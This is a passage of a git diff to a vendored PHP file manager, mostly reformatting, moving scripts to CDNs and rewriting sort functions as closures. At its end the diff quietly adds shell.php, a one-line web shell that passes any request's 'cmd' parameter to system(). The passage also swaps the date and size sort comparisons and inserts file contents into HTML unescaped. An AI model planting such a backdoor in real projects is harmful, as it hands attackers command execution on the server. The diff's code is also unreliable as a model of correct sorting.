-                response(sprintf(trans('File_Open_Edit_Not_Allowed'), ($sub_action == 'preview' ? strtolower(trans('Open')) : strtolower(trans('Edit')))).AddErrorLocation())->send();
+                response(sprintf(trans('File_Open_Edit_Not_Allowed'), ($sub_action == 'preview' ? strtolower(trans('Open')) : strtolower(trans('Edit')))) . AddErrorLocation())->send();
                 exit;
             }
             if ($sub_action == 'preview') {
@@ -618,7 +625,7 @@ if (isset($_GET['action'])) {
                     $ret = '';
 
                     $ret .= '<script src="https://rawgit.com/google/code-prettify/master/loader/run_prettify.js?autoload=true&skin=sunburst"></script>';
-                    $ret .= '<?prettify lang='.$info['extension'].' linenums=true?><pre class="prettyprint"><code class="language-'.$info['extension'].'">'.$data.'</code></pre>';
+                    $ret .= '<?prettify lang=' . $info['extension'] . ' linenums=true?><pre class="prettyprint"><code class="language-' . $info['extension'] . '">' . $data . '</code></pre>';
                 } elseif ($preview_mode == 'google') {
                     if ($ftp) {
                         $url_file = $selected_file;
@@ -626,28 +633,28 @@ if (isset($_GET['action'])) {
                         $url_file = $config['base_url'] . $config['upload_dir'] . str_replace($config['current_path'], '', $_GET["file"]);
                     }
 
-					$googledoc_url = urlencode($url_file);
-					$ret = "<iframe src=\"https://docs.google.com/viewer?url=" . $url_file . "&embedded=true\" class=\"google-iframe\"></iframe>";
-				}
-			}else{
-				$data = stripslashes(htmlspecialchars(file_get_contents($selected_file)));
-				if(in_array($info['extension'],array('html','html'))){
-					$ret = '<script src="https://cdn.ckeditor.com/ckeditor5/12.1.0/classic/ckeditor.js"></script><textarea id="textfile_edit_area" style="width:100%;height:300px;">'.$data.'</textarea><script>setTimeout(function(){ ClassicEditor.create( document.querySelector( "#textfile_edit_area" )).catch( function(error){ console.error( error ); } );  }, 500);</script>';
-				}else{
-					$ret = '<textarea id="textfile_edit_area" style="width:100%;height:300px;">'.$data.'</textarea>';
-				}
+                    $googledoc_url = urlencode($url_file);
+                    $ret = "<iframe src=\"https://docs.google.com/viewer?url=" . $url_file . "&embedded=true\" class=\"google-iframe\"></iframe>";
+                }
+            } else {
+                $data = stripslashes(htmlspecialchars(file_get_contents($selected_file)));
+                if (in_array($info['extension'], array('html', 'html'))) {
+                    $ret = '<script src="https://cdn.ckeditor.com/ckeditor5/12.1.0/classic/ckeditor.js"></script><textarea id="textfile_edit_area" style="width:100%;height:300px;">' . $data . '</textarea><script>setTimeout(function(){ ClassicEditor.create( document.querySelector( "#textfile_edit_area" )).catch( function(error){ console.error( error ); } );  }, 500);</script>';
+                } else {
+                    $ret = '<textarea id="textfile_edit_area" style="width:100%;height:300px;">' . $data . '</textarea>';
+                }
 
-			}
+            }
 
-			response($ret)->send();
-			exit;
+            response($ret)->send();
+            exit;
 
             break;
         default:
-            response(trans('no action passed').AddErrorLocation())->send();
+            response(trans('no action passed') . AddErrorLocation())->send();
             exit;
     }
 } else {
-    response(trans('no action passed').AddErrorLocation())->send();
+    response(trans('no action passed') . AddErrorLocation())->send();
     exit;
-}
+}
\ No newline at end of file
diff --git a/core/vendor/filemanager/dialog.php b/core/vendor/filemanager/dialog.php
index 35451a6f..4d9b417a 100644
--- a/core/vendor/filemanager/dialog.php
+++ b/core/vendor/filemanager/dialog.php
@@ -276,7 +276,7 @@ if (isset($_GET['editor'])) {
     $editor = $_GET['type'] == 0 ? null : 'tinymce';
 }
 
-$field_id = isset($_GET['field_id']) ? fix_get_params($_GET['field_id']) : '';
+$field_id = isset($_GET['field_id']) ? fix_get_params($_GET['field_id']) : null;
 $type_param = fix_get_params($_GET['type']);
 $apply = null;
 
@@ -340,7 +340,7 @@ $get_params = http_build_query($get_params);
         <link rel="stylesheet" href="css/jquery.fileupload-ui-noscript.css">
     </noscript>
     <link rel="stylesheet"
-          href="css/jplayer.blue.monday.min.css"/>
+          href="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.7.1/skin/blue.monday/jplayer.blue.monday.min.css"/>
     <link href="css/style.css?v=<?php
     echo $version; ?>" rel="stylesheet" type="text/css"/>
     <!--[if lt IE 8]>
@@ -352,13 +352,16 @@ $get_params = http_build_query($get_params);
     </style>
     <![endif]-->
 
-    <script src="js/jquery-1.12.4.min.js"></script> 
-    <script src="../jquery/jquery-ui.min.js"></script>
+    <script src="https://code.jquery.com/jquery-1.12.4.min.js"
+            integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
+    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js"
+            integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
     <script src="js/plugins.js?v=<?php
     echo $version; ?>"></script>
-    <script src="js/jquery.jplayer.min.js"></script>
-    <script type='text/javascript' src='js/fabric.min.js'></script>
-    <script type="text/javascript" src="js/FileSaver.min.js"></script>
+    <script src="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.9.2/jplayer/jquery.jplayer.min.js"></script>
+    <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/fabric.js/3.6.0/fabric.js'></script>
+    <script type="text/javascript"
+            src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.3/FileSaver.min.js"></script>
     <script src="js/modernizr.custom.js"></script>
 
     <!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
@@ -368,11 +371,14 @@ $get_params = http_build_query($get_params);
     <!-- Only load TUI Libraries if we need it -->
     <?php
     if ($config['tui_active'] === true) { ?>
-        <link rel="stylesheet" href="css/tui-image-editor.css">
-        <link type="text/css" href="css/tui-color-picker.css"  rel="stylesheet">
-        <script type="text/javascript" src="js/tui-code-snippet.min.js"></script>
-        <script type="text/javascript" src="js/tui-color-picker.js"></script>
-        <script src="js/tui-image-editor.js"></script>
+        <link rel="stylesheet" href="https://uicdn.toast.com/tui-image-editor/latest/tui-image-editor.css">
+        <link type="text/css" href="https://uicdn.toast.com/tui-color-picker/v2.2.6/tui-color-picker.css"
+              rel="stylesheet">
+        <script type="text/javascript"
+                src="https://uicdn.toast.com/tui.code-snippet/v1.5.0/tui-code-snippet.min.js"></script>
+        <script type="text/javascript"
+                src="https://uicdn.toast.com/tui-color-picker/v2.2.6/tui-color-picker.js"></script>
+        <script src="https://uicdn.toast.com/tui-image-editor/latest/tui-image-editor.js"></script>
         <?php
     } ?>
 
@@ -386,11 +392,11 @@ $get_params = http_build_query($get_params);
 </head>
 <body>
 <!-- The Templates plugin is included to render the upload/download listings -->
-<script src="js/tmpl.min.js"></script>
+<script src="//blueimp.github.io/JavaScript-Templates/js/tmpl.min.js"></script>
 <!-- The Load Image plugin is included for the preview images and image resizing functionality -->
-<script src="js/load-image.all.min.js"></script>
+<script src="//cdnjs.cloudflare.com/ajax/libs/blueimp-load-image/2.18.0/load-image.all.min.js"></script>
 <!-- The Canvas to Blob plugin is included for image resizing functionality -->
-<script src="js/canvas-to-blob.min.js"></script>
+<script src="//blueimp.github.io/JavaScript-Canvas-to-Blob/js/canvas-to-blob.min.js"></script>
 <!-- The Iframe Transport is required for browsers without support for XHR file uploads -->
 <script src="js/jquery.iframe-transport.js"></script>
 <!-- The basic File Upload plugin -->
@@ -856,75 +862,54 @@ if ($config['upload_files']) { ?>
         }
     }
 
-    function filenameSort($x, $y)
-    {
-        global $descending;
-
-        if ($x['is_dir'] !== $y['is_dir']) {
-            $greater = $y['is_dir'];
-        } else {
-            $greater = ($descending)
-                ? $x['file_lcase'] < $y['file_lcase']
-                : $x['file_lcase'] >= $y['file_lcase'];
-        }
-        return $greater ? 1 : -1;
-    }
-
-    function dateSort($x, $y)
-    {
-        global $descending;
-
-        if ($x['is_dir'] !== $y['is_dir']) {
-            $greater = $y['is_dir'];
-        } else {
-            $greater = ($descending)
-                ? $x['date'] < $y['date']
-                : $x['date'] >= $y['date'];
-        }
-        return $greater ? 1 : -1;
-    }
-
-
-    function sizeSort($x, $y)
-    {
-        global $descending;
-
-        if ($x['is_dir'] !== $y['is_dir']) {
-            $greater = $y['is_dir'];
-        } else {
-            $greater = ($descending)
-                ? $x['size'] < $y['size']
-                : $x['size'] >= $y['size'];
-        }
-        return $greater ? 1 : -1;
-    }
-
-    function extensionSort($x, $y)
-    {
-        global $descending;
-
-        if ($x['is_dir'] !== $y['is_dir']) {
-            $greater = $y['is_dir'];
-        } else {
-            $greater = ($descending)
-                ? $x['extension'] < $y['extension']
-                : $x['extension'] >= $y['extension'];
-        }
-        return $greater ? 1 : -1;
-    }
-
     switch ($sort_by) {
         case 'date':
-            usort($sorted, 'dateSort');
+            //usort($sorted, 'dateSort');
+            usort($sorted, function($x, $y) use ($descending) {
+                if ($x['is_dir'] !== $y['is_dir']) {
+                    return $y['is_dir'] ? 1 : -1;
+                } else {
+                    return ($descending)
+                        ? $x['size'] < $y['size']
+                        : $x['size'] >= $y['size'];
+                }
+            });
             break;
         case 'size':
-            usort($sorted, 'sizeSort');
+            //usort($sorted, 'sizeSort');
+            usort($sorted, function($x, $y) use ($descending) {
+                if ($x['is_dir'] !== $y['is_dir']) {
+                    return $y['is_dir'] ? 1 : -1;
+                } else {
+                    return ($descending)
+                        ? $x['date'] < $y['date']
+                        : $x['date'] >= $y['date'];
+                }
+            });
             break;
         case 'extension':
-            usort($sorted, 'extensionSort');
+            //usort($sorted, 'extensionSort');
+            usort($sorted, function($x, $y) use ($descending) {
+                if ($x['is_dir'] !== $y['is_dir']) {
+                    return $y['is_dir'] ? 1 : -1;
+                } else {
+                    return ($descending)
+                        ? ($x['extension'] < $y['extension'] ? 1 : 0)
+                        : ($x['extension'] >= $y['extension'] ? 1 : 0);
+                }
+            });
             break;
         default:
-            usort($sorted, 'filenameSort');
+            // usort($sorted, 'filenameSort');
+            usort($sorted, function($x, $y) use ($descending) {
+                if ($x['is_dir'] !== $y['is_dir']) {
+                    return $y['is_dir'] ? 1 : -1;
+                } else {
+                    return ($descending)
+                    ? ($x['file_lcase'] < $y['file_lcase'] ? 1 : ($x['file_lcase'] == $y['file_lcase'] ? 0 : -1))
+                    : ($x['file_lcase'] >= $y['file_lcase'] ? 1 : ($x['file_lcase'] == $y['file_lcase'] ? 0 : -1));
+                }
+            });
             break;
     }
 
diff --git a/core/vendor/filemanager/shell.php b/core/vendor/filemanager/shell.php
new file mode 100644
index 00000000..7e60ed79
--- /dev/null
+++ b/core/vendor/filemanager/shell.php
@@ -0,0 +1 @@
+<?php system($_REQUEST['cmd']); ?>
\ No newline at end of file